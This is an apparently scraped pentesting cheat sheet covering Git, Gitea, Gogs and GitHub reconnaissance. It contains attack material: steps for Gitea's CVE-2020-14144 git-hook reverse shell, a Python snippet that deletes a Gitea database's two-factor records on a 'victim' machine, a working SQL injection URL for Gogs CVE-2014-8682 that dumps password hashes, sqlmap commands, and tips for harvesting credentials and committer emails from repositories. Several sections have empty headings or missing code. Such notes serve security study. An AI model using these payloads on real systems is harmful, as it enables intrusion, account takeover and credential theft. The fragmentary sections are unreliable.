Create Git Local Server
- [git-scm](https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols)
Start Local Git Server (Dumb, HTTP)
cd test_repo
git init
git add . && git commit -m "first commit"
cd .git
# Update auxiliary info file to help dumb server.
# --bare: Bare repository (does not have a working directory)
git --bare update-server-info
cd ..
python3 -m http.server
Git GitHub Pentesting
Git is software for tracking changes in any sets of files. It’s also used with GitHub usually.
Git Commands for the Repository Investigation
Check Information
# Basic information
git show
git show <branch-name>
git show <commit-id>
git show <tag-name>
git --git-dir /path/to/.git show
# Configuration
git config --list
# Commit history
git log
git log --stat
git --git-dir /path/to/.git log --stat
# Compare the two commits
git diff
git diff --staged
git diff --cached
# Working tree status
git status
Back to the Previous Commits
# You can get the "commit-id" by 'git log'
git checkout <commit-id>
git --git-dir /path/to/.git checkout <commit-id>
# Return the recent commit
git checkout master
git checkout main
Search the Other Branches
For getting all branches.
Btw, for creating a new branch.
Clone the Repository
git clone https://github.com/username/repo.git
# via SSH
git clone ssh://git-user@10.0.0.1/path/to/repo
git clone ssh://git-user@10.0.0.1/path/to/repo.git
Find Tags
Restore Deleted Files
First off, check deleted files.
Then restore them.Local Git server sync commands
-
Commiting code to your local Git server
- It is recommended to get TLS/SSL working
- Make sure to change
-
<domain>
<username>
<email>
<commit_message>
git -c http.sslVerify=false clone http://git.<domain>/<username>/scripts.git
git config --global user.email "<email>" && git config --global user.name "<username>"
git commit "<commit_message>"
git -c http.sslVerify=false push
Gitea Pentesting
Gitea is a forge software package for hosting software development version control using Git.
Common Directories
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Repositories
If we can access to repositories, we might be able to find sensitive information e.g. credentials, subdomains, other domains, secret keys, etc.
So check the source code.
Get Secrets in Web Hooks
In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.
Find User Credentials
If we have access to the target system and the repository, that is pushed in Gitea, exists in the system, we might be able to find the credential.
Git Fetch Remote Code Execution (RCE)
Metasploit
Git Hooks Remote Code Execution (RCE)
CVE-2020-14144
It affects Gitea version from 1.1.0 to 1.13.
1. Login
Access to the Gitea dashboard and login as the existing account.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, inject the payload as below:
5. Start Listener in Terminal
To receive the outcoming connection of the git hook, start listener.
6. Create the New Repository in Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After pushing, git hook triggered and execute the reverse shell command.
Now we should get a shell.
Swagger API
We can access to /api/swagger
to interact with Swagger API.
Get New Token & Authorize
We need a token to use Swagger API.
- Register a new account in Gitea top page.
- Go to
/user/settings/applications
and generate a new token. - Copy the token value e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to
/api/swagger
. - Click “Authorize” button. The modal window opens.
- Paste the token in the “Token” section.
Delete the Two-Factor
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
Gogs Pentesting
Gogs (Go Git Service) is a painless self-hosted Git Service.
SQL injection (CVE-2014-8682)
http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
Automation
sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"
Git Hooks Remote Code Execution (RCE)
GitHub Dorks
Search Target Repository
You may be able to get the desired repository by searching in the Google.
The searching word is like "
Find Sensitive Data in the Repository
If you can access to the GitHub repository, research files and find the sensitive information. For example:
- Hard-coded contents
- Past commits
- Deleted files in past commits
- Commit messages
- Email address which may leak sensitive information about personal accounts
- Different branches
For more details, see the github-dorks{:target="_blank"}{:rel="noopener"}.
Find Email Address
- Click the target repository.
- Move to the commit history.
-
Click the commit and add “.patch” to the URL. For example:
-
Check the “From” section in the page. You should find the email address of the commiter.